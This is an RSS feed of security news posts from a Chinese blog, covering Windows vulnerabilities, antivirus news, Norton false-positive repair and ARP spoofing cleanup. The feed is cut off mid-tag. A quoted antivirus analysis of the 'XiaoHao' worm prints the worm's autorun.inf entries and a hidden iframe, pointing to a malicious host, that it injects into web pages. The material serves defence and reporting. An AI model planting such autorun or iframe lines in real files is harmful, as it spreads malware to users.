<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0">
<channel>
<title><![CDATA[J.J.Bear's Heaven]]></title> 
<link>http://www.springbbs.com/blog/index.php</link> 
<description><![CDATA[~知而获智，智达高远~]]></description> 
<language>zh-cn</language> 
<copyright><![CDATA[J.J.Bear's Heaven]]></copyright>
<item>
<link>http://www.springbbs.com/blog/read.php?551</link>
<title><![CDATA[GOOGLE提供永久免费瑞星杀毒软件]]></title> 
<author>jeffchen88 &lt;webmaster@springbbs.com&gt;</author>
<category><![CDATA[资讯]]></category>
<pubDate>Fri, 24 Apr 2009 14:53:25 +0000</pubDate> 
<guid>http://www.springbbs.com/blog/read.php?551</guid> 
<description>
<![CDATA[ 
	给大家发两个永久免费的正版瑞星，需要的下：<br/><br/>1、瑞星google版，瑞星和google合作推出，入选google软件精选，属于永久免费软件。<br/>地址：<a href="http://pack.google.com/intl/zh-cn/pack_installer.html" target="_blank">http://pack.google.com/intl/zh-cn/pack_installer.html</a><br/>缺点：只有杀毒软件，没有防火墙的哈，需要从google上选中，然后点下载，用google_updater下载，且下载后，就会自行安装。<br/><br/>2、瑞星推出的英文永久免费版，为抢国外市场推出的，永久免费。<br/>地址：<a href="http://www.freerav.com/" target="_blank">http://www.freerav.com/</a><br/>缺点：界面是英文的，同样只有杀毒软件，没有防火墙，另外这个版本的升级服务器速度要稍微慢一点。类似于小红伞，免费用户升级速度就是要慢一点。<br/><br/>以上两个都是永久免费的正版，而且具有原版的所有功能，喜欢用瑞星的可以下载,可以来回复一下使用效果哈。<br/><br/><br/><br/><br/><br/><br/><br/>Tags - <a href="http://www.springbbs.com/blog/tag.php?tag=%25E7%2591%259E%25E6%2598%259F" rel="tag">瑞星</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=google" rel="tag">google</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=%25E8%25B0%25B7%25E6%25AD%258C" rel="tag">谷歌</a>
]]>
</description>
</item><item>
<link>http://www.springbbs.com/blog/read.php?520</link>
<title><![CDATA[[紧急]Windows紧急安全更新(KB958644) MS08-067 ]]></title> 
<author>jeffchen88 &lt;webmaster@springbbs.com&gt;</author>
<category><![CDATA[资讯]]></category>
<pubDate>Fri, 24 Oct 2008 07:09:47 +0000</pubDate> 
<guid>http://www.springbbs.com/blog/read.php?520</guid> 
<description>
<![CDATA[ 
	<strong><span style="font-size: 12px;"><a href="http://www.microsoft.com" target="_blank" title="http://www.microsoft.com" class="mykeyword">微软</a>爆出特大安全漏洞,会引发大面积远程攻击甚至完全控制,危害程度跟"冲击波"类似,强烈建议各网友下载此补丁.</span></strong><br/><br/><div class="quote"><div class="quote-title">引用</div><div class="quote-content">摘要<br/>此安全更新解决了服务器服务中一个秘密报告的漏洞。 如果用户在受影响的系统上收到特制的 RPC 请求，则该漏洞可能允许远程执行代码。 在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上，攻击者可能未经身份验证即可利用此漏洞运行任意代码。 此漏洞可能用于进行蠕虫攻击。 防火墙最佳做法和标准的默认防火墙配置有助于保护网络资源免受从企业外部发起的攻击。<br/><br/>对于 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 的所有受支持版本，此安全更新的等级为“严重”；对于 Windows Vista、Windows Server 2008 和 Windows 7 Beta 的所有受支持版本，此安全更新的等级为“重要”。<br/><br/>该安全更新通过更正服务器服务处理 RPC 请求的方式来解决该漏洞。<br/></div></div><br/>Tags - <a href="http://www.springbbs.com/blog/tag.php?tag=windows" rel="tag">windows</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=microsoft" rel="tag">microsoft</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=%25E5%25BE%25AE%25E8%25BD%25AF" rel="tag">微软</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=%25E5%25AE%2589%25E5%2585%25A8" rel="tag">安全</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=%25E5%25AE%2589%25E5%2585%25A8%25E5%2585%25AC%25E5%2591%258A" rel="tag">安全公告</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=%25E6%25BC%258F%25E6%25B4%259E" rel="tag">漏洞</a>
]]>
</description>
</item><item>
<link>http://www.springbbs.com/blog/read.php?441</link>
<title><![CDATA[破坏力超“熊猫烧香” 江民发布“小浩”蠕虫技术报告]]></title> 
<author>jeffchen88 &lt;webmaster@springbbs.com&gt;</author>
<category><![CDATA[资讯]]></category>
<pubDate>Wed, 15 Aug 2007 13:58:39 +0000</pubDate> 
<guid>http://www.springbbs.com/blog/read.php?441</guid> 
<description>
<![CDATA[ 
	<p><strong>以下分析来自江民科技：<br /></strong><br />8 月14日，江民科技反病毒中心监测到，一种名为&ldquo;小浩&rdquo;蠕虫病毒出现在网络上，该病毒和&ldquo;熊猫烧香&rdquo;蠕虫病毒类似，可以感染&nbsp;*.exe可执行程序，可以通过U盘传播，还会感染各种网页脚本程序，插入带毒网址，但是与&ldquo;熊猫烧香&rdquo;蠕虫病毒不同的是，被感染后的*.exe文件将遭到破坏且无法恢复！<br /><br />江民反病毒专家分析该病毒详细技术特征如下：<br /><br /></p><p>病毒名称：Worm/XiaoHao.a<br />中&nbsp;文&nbsp;名：小浩蠕虫<br />病毒类型：蠕虫<br />危害等级：★★★★<br />影响平台：Win&nbsp;9X/ME/NT/2000/XP/2003<br />病毒运行特征：<br />Worm/XiaoHao.a&nbsp;蠕虫采用Visual&nbsp;C++6.0&nbsp;工具编写，并经过UPX工具加壳处理，病毒运行后，会在每个硬盘根目录下释放病毒文件：<br />c:xiaohao.exe,&nbsp;402706字节<br />c:autorun.inf,&nbsp;91字节<br />其 中xiaohao.exe&nbsp;文件为病毒主体，该文件运行后搜索全盘扩展名为*.exe&nbsp;的文件，将自身病毒体写入到正常文件中，从而使原文件成为新的病毒 体，被感染后的文件图标为一个表示有&ldquo;浩&rdquo;字的图标，当浏览含有被感染病毒文件的窗口时，窗口的标题栏会有已中毒&nbsp;X14o-H4o's&nbsp;Virus&nbsp;的 字样。<br />如下图：<br /><br /><img src="http://www.jiangmin.com/images/xiaohao.jpg" border="0" width="592" height="456" /><br /><br />由于该病毒采用的是覆盖式写入，因此被感染后的文件无法恢复。<br /><br />该病毒进程还会创建iexplore.exe&nbsp;子进程，利用多个系统漏洞下载木马病毒。<br /><br />另外，病毒还在各个硬盘跟目录下释放的autorun.inf&nbsp;文件是病毒主体的伴生文件，该文件内容如下：<br />[Autorun]<br />open=Xiaohao.exe<br />shellexecute=Xiaohao.exe<br />shellAutocommand=Xiaohao.exe<br />这样，该病毒就可以利用Windows系统的自动播放功能借助与U盘来传播，当用户在不知情的情况下，双击已感染该病毒的U盘时，就会将病毒传播到新的系统中。<br /><br />该病毒还会搜索全盘中扩展名为*.htm、*.html、*.asp、*.aspx、*.php、*.jsp&nbsp;的网页脚本文件，向其中插入恶意网址连接&lt;iframe&nbsp;src=http://xiaohao.yona.biz/***.htm&nbsp;width=0&nbsp;height=0&gt;&lt;/iframe&gt;， 该病毒网址会利用MS06-014、MS06-046、MS07-017&nbsp;等多个系统漏洞下载并且执行病毒文件http: //xiaohao.yona.biz/***.exe&nbsp;，该文件为病毒体自身。<br /><br />该病毒会将系统时间修改为2005年1月17日，使一些杀毒软件的使用授权失效，病毒还会模拟鼠标操作，企图绕过杀毒软件的主动防御功能。<br /><br />该病毒会将其他未被感染的文件设置成隐藏属性，还会生成文件：c:Jilu.txt，用以记录被感染的文件和被隐藏的文件。该病毒还会破坏注册表相关键值，使其不能显示隐藏文件，严重影响了电脑的正常使用。<br /><br />据悉，该病毒作者还将病毒源代码公开在互联网中，并且还留下了自己的QQ号和<a href="http://www.springbbs.com/blog" target="_blank" title="http://www.springbbs.com/blog" class="mykeyword">博客</a>地址，称&ldquo;欢迎各位大牛.&nbsp;来指导我&nbsp;&nbsp;或者是交流&rdquo;&nbsp;，具有明显的技术炫耀性。</p><br/>Tags - <a href="http://www.springbbs.com/blog/tag.php?tag=%25E5%25B0%258F%25E6%25B5%25A9%25E7%2597%2585%25E6%25AF%2592" rel="tag">小浩病毒</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=%25E5%2588%2586%25E6%259E%2590%25E6%258A%25A5%25E5%2591%258A" rel="tag">分析报告</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=%25E5%25AE%2589%25E5%2585%25A8" rel="tag">安全</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=%25E6%259C%25A8%25E9%25A9%25AC" rel="tag">木马</a>
]]>
</description>
</item><item>
<link>http://www.springbbs.com/blog/read.php?429</link>
<title><![CDATA[【转】对反病毒产品你应该知道的几个事实 ]]></title> 
<author>jeffchen88 &lt;webmaster@springbbs.com&gt;</author>
<category><![CDATA[资讯]]></category>
<pubDate>Wed, 20 Jun 2007 15:52:31 +0000</pubDate> 
<guid>http://www.springbbs.com/blog/read.php?429</guid> 
<description>
<![CDATA[ 
	作者系：褚诚云 目前在<a href="http://www.microsoft.com" target="_blank" title="http://www.microsoft.com" class="mykeyword">微软</a>视窗安全部门担任软件安全工程师。<br/>转载自：CSDN <a href="http://www.springbbs.com/blog" target="_blank" title="http://www.springbbs.com/blog" class="mykeyword">博客</a><br/><br/><hr/><br/>申明：这里需要强调的是，反病毒产品（包括反间谍产品）是保证计算机安全的一个重要组成部分。本文的主要目的是为了让读者了解到反病毒产品的局限性，以便能更好的保护计算机系统。<br/> <br/>我看到许多计算机用户在安全认识上都有着这么一个误区：只要我的系统上安装了一个反病毒产品，就可以高枕无忧，万事大吉了？反病毒产品自然会保护我的系统不受攻击，我的系统现在安全了。<br/> <br/>错错错！<br/> <br/>在安全领域中有这么一句话：比没有安全更糟糕的是虚假的安全。如果你采取的安全措施 仅仅是安装了一个反病毒软件的话，非常可能，你的系统只是拥有一个虚假的安全。<br/> <br/>为什么？<br/> <br/>事实一，反病毒产品的工作原理是基于样本文件的特征码扫描。<br/> <br/>无论是反病毒软件，还是反间谍软件，工作机理均是基于病毒或间谍软件样本的特征代码进行内存和文件系统的扫描。这个特征代码可以是一段特定的字符串，对程序特定区域的一个Hash，仿真运行（Emulation）时的一段特定指令，等等。<br/> <br/>那么，如果反病毒公司没有拿到病毒样本，就无法提供查询病毒的特征代码。有了病毒样本，才有扫描的特征代码。所有反病毒产品，都是基于这种被动式的工作原理。至于炒作的很热的主动式防御，这类技术目前还并不成熟，最大的问题是虚假误报（false positive）。<br/> <br/>但是，计算机攻击的目的和模式发展方向是更具有针对性和特定性的攻击。见2006年计算机安全发展最新趋势 <br/> (<a href="http://blog.csdn.net/chengyun_chu/archive/2007/03/17/1531842.aspx)" target="_blank">http://blog.csdn.net/chengyun_chu/archive/2007/03/17/1531842.aspx)</a><br/>· &nbsp; &nbsp; &nbsp; &nbsp; 从大规模网络传播，向小规模受控传播变化。不再是以传播的速度越快越好，而是有意识的将传播的速度放慢，以延迟被安全软件公司发现的时间。<br/>· &nbsp; &nbsp; &nbsp; &nbsp; 从没有特定用户，向针对特定的用户群变化。不再是以感染用户的数目越多也好，而是有意识的针对特定的用户群（如地域，公司等），以降低被安全软件公司发现的机会。<br/>· &nbsp; &nbsp; &nbsp; &nbsp; 从没有特定攻击目的，向有特定的目的变化。不再是简单的要登上报纸的头版，或者是恶作剧，而是有特定的目的，即窃取用户的机密信息，如银号账号，密码等，以获取经济上的利益。<br/> <br/>那么不难看出，<br/> <br/>局限一：<br/> <br/>对于小规模，特定范围传播的病毒（这是计算机病毒发展的最新趋势），反病毒软件公司可能没有得到病毒样本，因此也无法提供特征代码。那么，对这些病毒，反病毒软件就无法检测到。即使反病毒软件公司提供特征代码，与病毒传播也有时间间隔。这段时间里，用户也是不被保护的。<br/> <br/>事实二，反病毒产品是运行于操作系统平台上的应用。它无法替代操作系统的核心安全性能。<br/> <br/>以Windows系统上的反病毒产品为例。几乎所有的反病毒产品都包括以下两个部分，运行于用户模式（user mode）下的应用界面，和运行于核心模式（kernel mode）下的一个文件系统的驱动程序（file system driver）。一个反病毒产品能看到的系统状态，例如系统中有哪些进程在运行，系统的硬盘有那些文件，系统的注册表（registry）中有哪些配置，都是由操作系统的核心模式提供的。<br/> <br/>一个令人担心的趋势就是Windows系统中的Rootkit的发展。所谓Rootkit，简单的说，就是这么一类软件，修改操作系统的工作方式，以达到隐藏特定信息（如系统中有哪些特定的文件，进程等等）的目的。那么，一旦操作系统的核心模式已经被Rootkit攻击，那么，反病毒产品看到的系统的目前工作状态都可能是虚假的信息，又如何能进行有效的扫描呢？<br/> <br/>局限二：<br/>对于针对操作系统的核心攻击，如Rootkit，仅依靠反病毒产品，是无法提供有效的保护的。<br/> <br/> <br/>事实三，反病毒产品针对的是传统的通过文件传播（病毒，间谍软件）的攻击模式。<br/> <br/>问题是，病毒，间谍软件，只是对计算机系统的攻击手段的一种。比如说对普通用户而言，网络钓鱼（phishing website），XSS（cross-site scripting）攻击以窃取用户的敏感数据，对企业用户而言，SQL攻击，提升权限攻击（elevation of privilege ）等等，都不是反病毒产品所能涵盖的。<br/> <br/>局限三：<br/>针对计算机系统的许多攻击手段，如XSS（cross-site scripting）攻击，是反病毒产品不能保护的。<br/> <br/>总结：反病毒产品是计算机安全环节中的一个重要组成，但是，它仅仅是其中的一环，有自身的局限性。期待仅仅依靠反病毒产品来保护计算机系统的安全，是不现实的。一个完善的计算机安全系统，需要有其它许多构件支持，如操作系统的安全性能，补丁管理（Patch Management），防火墙，用户教育，物理安全，网络管理，数据库安全等等。<br/>Tags - <a href="http://www.springbbs.com/blog/tag.php?tag=%25E7%2597%2585%25E6%25AF%2592" rel="tag">病毒</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=%25E5%25AE%2589%25E5%2585%25A8" rel="tag">安全</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=%25E5%258F%258D%25E7%2597%2585%25E6%25AF%2592" rel="tag">反病毒</a>
]]>
</description>
</item><item>
<link>http://www.springbbs.com/blog/read.php?416</link>
<title><![CDATA[诺顿(Backdoor.Haxdoor)的误杀导致系统崩溃的解决方法]]></title> 
<author>jeffchen88 &lt;webmaster@springbbs.com&gt;</author>
<category><![CDATA[资讯]]></category>
<pubDate>Fri, 18 May 2007 14:32:21 +0000</pubDate> 
<guid>http://www.springbbs.com/blog/read.php?416</guid> 
<description>
<![CDATA[ 
	诺顿升级到5月17日版本后，会导致打过KB924270补丁的XP系统崩溃，其原因是诺顿将KB924270更新过的netapi32.dll和lsasrv.dll文件误报为Backdoor.Haxdoor后门病毒。经过初步调查，lsasrv.dll和netapi32.dll是正常的系统文件。<br/><br/>该文件在诺顿隔离后，系统重启导致蓝屏并提示：STOP c000021a Unkown hard error，安全模式下也无法进入，此类情况在多个<a href="http://www.springbbs.com/bbs" target="_blank" title="http://www.springbbs.com/bbs" class="mykeyword">论坛</a>也有类似描述。事件的起因是norton杀毒软件曾经报告发现Backdoor.Haxdoor病毒。金山客服中心再联系多个用户后，证实是NORTON的严重误报导致系统不能启动。NORTON误报的系统文件lsasrv.dll和netapi32.dll为Backdoor.Haxdoor病毒，norton杀毒软件会自动将这两个dll文件隔离。这两个系统文件被删除后，会导致重启后蓝屏，屏幕上显示unknown hard error，安全模式下也无法进入。杀毒软件误报事件不可避免，但此番Symantec的Norton杀毒软件误报系统文件为病毒，给用户造成损失之大，实属罕见。<br/><br/><br/><strong>修复方法：</strong><br/><br/>　　<strong>瑞星反病毒专家建议：还没有受到误杀影响的用户</strong><br/><br/>　　1、拔掉网线再开启计算机。<br/><br/>　　2、启动计算机后，关闭诺顿杀毒软件的实时监控程序再插入网线上网。<br/><br/>　　3、等待赛门铁克公司解决该问题后，才可以继续启用诺顿实时监控程序。<br/><br/>　　4、关闭杀毒软件实时监控程序可能导致计算机感染其它的病毒、木马及恶意程序，用户可以暂时选用其它的杀毒软件。<br/><br/>　　<strong>对于系统已经瘫痪的用户：</strong><br/><br/>　　1、使用windows 安装光盘启动系统，在提示菜单处按R进入恢复控制台。 <br/><br/> &nbsp; &nbsp;<a href="http://image2.sina.com.cn/IT/ul/2007/0518/U761P2DT20070518155415.jpg" target="_blank"><img src="http://image2.sina.com.cn/IT/ul/2007/0518/U761P2DT20070518155415.jpg" class="insertimage" alt="点击在新窗口中浏览此图片" title="点击在新窗口中浏览此图片" border="0"/></a><br/><br/>　　2、在提示中按“1”然后回车，选择需要修复的系统，并输入管理员密码。<br/> &nbsp; &nbsp;<a href="http://image2.sina.com.cn/IT/ul/2007/0518/U761P2DT20070518155730.jpg" target="_blank"><img src="http://image2.sina.com.cn/IT/ul/2007/0518/U761P2DT20070518155730.jpg" class="insertimage" alt="点击在新窗口中浏览此图片" title="点击在新窗口中浏览此图片" border="0"/></a><br/> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Windows故障恢复控制台<br/><br/>　　3、执行如下命令进行修复(X表示光盘盘符)：<br/><br/>　　Expand x:&#92;I386&#92;netapi32.dl_ c:&#92;windows&#92;system32&#92; [回车]<br/><br/>　　Expand x:&#92;I386&#92;netapi32.dl_ c:&#92;windows&#92;system32&#92;dllcache&#92; [回车]<br/><br/>　　Expand x:&#92;I386&#92;lsasrv.dl_ c:&#92;windows&#92;system32&#92; [回车]<br/><br/>　　Expand x:&#92;I386&#92;lsasrv.dl_ c:&#92;windows&#92;system32&#92;dllcache&#92; [回车]<br/><br/>　　4、重新启动计算机，关闭诺顿的实时监控程序。<br/><br/>　　5、启动诺顿的隔离区，恢复netapi32.dll和lsasrv.dll。<br/><br/>　　6、等待赛门铁克公司解决该问题后，才可以继续启用诺顿实时监控程序。<br/><br/>　　7、关闭杀毒软件实时监控程序可能导致计算机感染其它的病毒、木马及恶意程序，用户可以暂时选用其它的杀毒软件。<br/><br/><br/> &nbsp; &nbsp; &nbsp; <strong>江民反病毒专家建议，遇到此类情况的用户可以采用以下几种方法处理：</strong><br/><br/>　　1、已经出现情况但未重启电脑的用户，可以从杀毒软件病毒隔离区恢复上述两个文件。<br/><br/>　　2、已经出现情况并且电脑重启后并无法进入系统的用户,可以使用系统安装盘，并设置BIOS从光驱启动，选择从控制台恢复系统，拷贝上述两个文件到硬盘相应目录下。<br/><br/>　　netapi32.dll和lsasrv.dll 文件在光盘f:&#92;I386目录下<br/><br/>　　把上述两个文件分别拷贝到以下两个路径： <br/><br/>　　c:&#92;windows&#92;system32&#92;netapi32.dll<br/><br/>　　c:&#92;windows&#92;system32&#92;lsasrv.dll <br/><br/>　　3、重启电脑，修改BIOS从硬盘启动电脑，系统即可进入。<br/><br/><br/>　　<strong>金山毒霸反病毒工程师建议广大用户：</strong><br/><br/>　　系统已经崩溃时建议用故障恢复控制台恢复被误杀的系统文件，操作步骤如下：<br/><br/> &nbsp; &nbsp; &nbsp;1、使用windows 安装光盘启动系统，在提示安装时，按R选择修复，再选择启动到故障恢复控制台。<br/><br/> &nbsp; &nbsp; &nbsp;2、在提示中选择当前运行的操作系统，多数情况下是按“1”，然后回车，需要输入管理员口令。<br/><br/> &nbsp; &nbsp; &nbsp;3、执行如下命令进行修复(X表示光盘盘符)：<br/> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Expand x:I386netapi32.dl_ c:windowssystem32<br/> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Expand x:I386netapi32.dl_ c:windowssystem32dllcache（并非必须）<br/> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Expand x:I386lsasrv.dl_ c:windowssystem32<br/> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Expand x:I386lsasrv.dl_ c:windowssystem32dllcache （并非必须）<br/> <br/> &nbsp; &nbsp; &nbsp; 4、在故障恢复控制台，运行listsvc，查看当前计算机服务属性，找到NORTON杀毒软件相关的服务名， &nbsp; &nbsp; &nbsp;NORTON 360的服务名包括"cltnetcnservice"、"eectrl"、"ccevtmgr”、"ccsetmgr"，其它版本的NORTON杀毒软件，服务名有所不同，可用listsvc命令详细查看。<br/>运行disable "服务名"，禁用NORTON杀毒软件相关服务。键入exit重新启动计算机。<br/> <br/> &nbsp; &nbsp; &nbsp; 5、联系symantec公司获得补丁，索取解决方案。对企业网管来讲，这次误报是个噩梦，网管员首先应该立即禁止全网更新，如果使用NORTON企业版更新过，需要配置升级回滚，撤销本次引发误报的病毒库升级。立即通知所有客户机不要重启电脑，从NORTON隔离区还原相应文件至系统目录。为简化修复步骤，可以使用winpe光盘引导系统，再恢复这两个系统文件到windowssystem32目录，然后禁用NORTON杀毒软件的实时监控功能，重启恢复系统。<br/> <br/>　　据了解，Haxdoor后门与灰鸽子非常类似，而该后门程序的隐藏技术还要强过灰鸽子木马，所以目前网络炒股的用户非常多，Haxdoor后门极有可能在此期间发作，用户需要高度警惕。 <br/><br/><br/><br/><br/><br/><br/><br/>Tags - <a href="http://www.springbbs.com/blog/tag.php?tag=%25E8%25AF%25BA%25E9%25A1%25BF" rel="tag">诺顿</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=%25E8%25AF%25AF%25E6%258A%25A5" rel="tag">误报</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=%25E4%25BF%25AE%25E5%25A4%258D" rel="tag">修复</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=windows" rel="tag">windows</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=microsoft" rel="tag">microsoft</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=%25E5%25BE%25AE%25E8%25BD%25AF" rel="tag">微软</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=symantec" rel="tag">symantec</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=%25E6%259D%2580%25E6%25AF%2592%25E8%25BD%25AF%25E4%25BB%25B6" rel="tag">杀毒软件</a>
]]>
</description>
</item><item>
<link>http://www.springbbs.com/blog/read.php?414</link>
<title><![CDATA[如何清除局域网中的ARP病毒]]></title> 
<author>jeffchen88 &lt;webmaster@springbbs.com&gt;</author>
<category><![CDATA[资讯]]></category>
<pubDate>Tue, 15 May 2007 00:10:24 +0000</pubDate> 
<guid>http://www.springbbs.com/blog/read.php?414</guid> 
<description>
<![CDATA[ 
	<p><span style="font-weight: bold">作者:陈静@金山毒霸</span><br />现在局域网中感染ARP病毒的情况比较多,清理和防范都比较困难,给不少的网络管理员造成了很多的困扰.下面就是个人在处理这个问题的一些经验,同时也在网上翻阅了不少的参考资料.<br /><br /></p><p></p><p style="text-indent: 2em"><strong>ARP病毒的症状</strong> </p><p style="text-indent: 2em">有时候无法正常上网，有时候有好了，包括访问网上邻居也是如此，拷贝文件无法完成，出现错误；局域网内的ARP包爆增，使用ARP查询的时候会发现不正常的MAC地址，或者是错误的MAC地址对应，还有就是一个MAC地址对应多个IP的情况也会有出现。 </p><p style="text-indent: 2em"></p><p style="text-indent: 2em"><strong>ARP攻击的原理</strong> </p><p style="text-indent: 2em">ARP欺骗攻击的包一般有以下两个特点，满足之一可视为攻击包报警：第一以太网数据 包头的源地址、目标地址和ARP数据包的协议地址不匹配。或者，ARP数据包的发送和目标地址不在自己网络网卡MAC数据库内，或者与自己网络MAC数据 库MAC/IP不匹配。这些统统第一时间报警，查这些数据包(以太网数据包)的源地址(也有可能伪造)，就大致知道那台机器在发起攻击了。现在有网络管理 工具比如网络执法官、P2P终结者也会使用同样的方式来伪装成网关，欺骗客户端对网关的访问，也就是会获取发到网关的流量，从而实现网络流量管理和网络监 控等功能，同时也会对网络管理带来潜在的危害，就是可以很容易的获取用户的密码等相关信息。 </p><p style="text-indent: 2em"></p><p style="text-indent: 2em"><strong>处理办法</strong> </p><p style="text-indent: 2em"><strong>通用的处理流程</strong> </p><p style="text-indent: 2em"><strong>1.先保证网络正常运行</strong> </p><p style="text-indent: 2em">方法一：编辑一个***.bat文件内容如下： </p><table border="1" cellspacing="0" cellpadding="2" width="400" align="center"><tbody><tr><td class="code" style="font-size: 9pt" bgcolor="#e6e6e6"><pre>arp.exe s<br />**.**.**.**（网关ip） ****<br />**<br />**<br />**<br />**（<br />网关MAC地址）<br />end</pre></td></tr></tbody></table><br />让网络用户点击就可以了! <p style="text-indent: 2em"></p><p style="text-indent: 2em">办法二：编辑一个注册表问题，键值如下： </p><table border="1" cellspacing="0" cellpadding="2" width="400" align="center"><tbody><tr><td class="code" style="font-size: 9pt" bgcolor="#e6e6e6"><pre>Windows Registry Editor Version 5.00<br />[HKEY_LOCAL_MACHINE&#92;SOFTWARE&#92;Microsoft&#92;Windows&#92;CurrentVersion&#92;Run]<br />&quot;MAC&quot;=&quot;arp s<br />网关IP地址网关MAC地址&quot;</pre></td></tr></tbody></table><br />然后保存成Reg文件以后在每个客户端上点击导入注册表。  <p style="text-indent: 2em"></p><p style="text-indent: 2em"><strong>2.找到感染ARP病毒的机器</strong> </p><p style="text-indent: 2em">a、在电脑上ping一下网关的IP地址，然后使用ARP －a的命令看得到的网关对应的MAC地址是否与实际情况相符，如不符，可去查找与该MAC地址对应的电脑。 </p><p style="text-indent: 2em">b、使用抓包工具，分析所得到的ARP数据报。有些ARP病毒是会把通往网关的路径 指向自己，有些是发出虚假ARP回应包来混淆网络通信。第一种处理比较容易，第二种处理比较困难，如果杀毒软件不能正确识别病毒的话，往往需要手工查找感 染病毒的电脑和手工处理病毒，比较困难。 </p><p style="text-indent: 2em">c、使用MAC地址扫描工具，Nbtscan扫描全网段IP地址和MAC地址对应表，有助于判断感染ARP病毒对应MAC地址和IP地址。 </p><p style="text-indent: 2em"></p><p style="text-indent: 2em"><strong>预防措施</strong> </p><p style="text-indent: 2em">1、及时升级客户端的操作系统和应用程式补丁； </p><p style="text-indent: 2em">2、安装和更新杀毒软件。 </p><p style="text-indent: 2em">3、如果网络规模较少，尽量使用手动指定IP设置，而不是使用DHCP来分配IP地址。 </p><p style="text-indent: 2em">4、如果交换机支持，在交换机上绑定MAC地址与IP地址。（不过这个实在不是好主意） </p><br/>Tags - <a href="http://www.springbbs.com/blog/tag.php?tag=arp" rel="tag">arp</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=%25E7%2597%2585%25E6%25AF%2592" rel="tag">病毒</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=mac" rel="tag">mac</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=%25E6%25AC%25BA%25E9%25AA%2597%25E6%2594%25BB%25E5%2587%25BB" rel="tag">欺骗攻击</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=%25E6%259D%2580%25E6%25AF%2592" rel="tag">杀毒</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=%25E7%25BB%25B4%25E6%258A%25A4" rel="tag">维护</a>
]]>
</description>
</item><item>
<link>http://www.springbbs.com/blog/read.php?396</link>
<title><![CDATA[利用微软高危险ANI鼠标指针漏洞蠕虫现身~]]></title> 
<author>jeffchen88 &lt;webmaster@springbbs.com&gt;</author>
<category><![CDATA[资讯]]></category>
<pubDate>Mon, 02 Apr 2007 01:48:26 +0000</pubDate> 
<guid>http://www.springbbs.com/blog/read.php?396</guid> 
<description>
<![CDATA[ 
	这2天,<a href="http://www.microsoft.com" target="_blank" title="http://www.microsoft.com" class="mykeyword">微软</a>爆出了高危险ANI鼠标指针漏洞(<a href="http://www.microsoft.com/technet/security/advisory/935423.mspx" target="_blank">Microsoft Security Advisory (935423)</a>),该漏洞感染范围很广,包括了VISTA的所有版本,XP的所有版本,以及2003的SP0和SP1版本以及2000SP4版本.昨天,该漏洞利用的蠕虫已经在国内出现,国内相关产商已经发布了预警,本BLOG也跟进提升了安全预警到中度二级预警,请各位留心.由于被该漏洞利用程序的蠕虫病毒具有隐蔽性,通常伪装成图片,因此只要用户访问到带有该图片的网站或邮件,都会被感染.并且不但影响IE浏览器,同时非IE内核浏览器也会被感染,同时网络即时通讯程序QQ,MSN等同样受影响~<br/><br/><div class="quote"><div class="quote-title">引用</div><div class="quote-content"><strong>该漏洞描述:</strong><br/>Microsoft Windows在处理畸形的动画图标文件（.ani）时存在缓冲区溢出漏洞，远程攻击者可能利用此漏洞控制用户机器。<br/><br/>Microsoft Windows在处理畸形文件（.ani）时没有正确地验证ANI头中所指定的大小，导致栈溢出漏洞。<br/><br/>如果用户受骗使用IE访问了恶意站点或打开了恶意的邮件消息的话，就会触发这个溢出，导致执行任意代码。<br/><br/>请注意Windows资源管理器也会处理一些文件扩展名的ANI文件，如.ani、.cur、.ico等。</div></div><br/><br/><br/><div class="quote"><div class="quote-title">引用</div><div class="quote-content"><strong>利用ANI漏洞进行播传病毒需要以下的步骤:</strong><br/><br/>1、病毒作者制作恶意ANI文件,使其能下载其它的病毒或木马程序;<br/><br/>2、病毒作者会将ANI文件更名为Jpeg、Bmp、Gif等常见图片文件放到网页中;<br/><br/>3、当用户利用IE浏览器访问这些网页时会自动将该ANI文件下载到本地;<br/><br/>4、IE浏览器在打开该ANI文件时,即可触发漏洞,并立即下载和执行其它的病毒或木马程序.</div></div><br/><br/>该病毒<strong>集熊猫烧香、维金两大病毒</strong>危害于一身,是一个传播性与破坏性极强的蠕虫,不但能疯狂感染用户电脑中的.exe文件,而且还可导致企业局域网大面积瘫痪.更为严重的是,该病毒可利用微软最新发现的动画指针漏洞进行传播,<strong><u>微软目前并未公布该漏洞的补丁</u></strong>,也就是说,包括Vista在内的Windows 所有用户,只要浏览带有恶意代码的Web网页或电子邮件将立刻感染该病毒.<br/><br/>根据国内某反病毒产商专家介绍,该蠕虫是一个Win32平台下的感染型蠕虫,可感染本地磁盘、可移动磁盘及共享目录中大小在10K---10M之间的所有.exe文件,感染扩展名为.ASP、.JSP、PHP、HTM、ASPX、 HTML的脚本文件,并可连接网络下载其他病毒.用户一旦感染该病毒,电脑速度将明显变慢,ACDSee等自保护软件也将无法运行,同时包括<a href="http://www.baidulink.com" 